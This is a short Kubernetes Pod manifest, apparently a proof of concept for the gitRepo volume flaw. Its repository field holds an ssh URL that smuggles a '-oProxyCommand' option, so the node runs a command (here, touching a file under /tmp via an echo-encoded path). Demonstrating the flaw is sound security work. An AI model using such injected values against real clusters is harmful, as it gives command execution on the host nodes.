apiVersion: v1
kind: Pod
metadata:
  name:   git-vuln
spec:
  containers:
    - name: git-vuln
      image: alpine:3.5
      volumeMounts:
        - name: git
          mountPath: /vuln
      args:
        - sleep
        - "100000"
  volumes:
    - name: git
      gitRepo:
        repository: "ssh://-oProxyCommand=touch\ `echo -e '\\x2ftmp\\x2ffoo'`/wat"
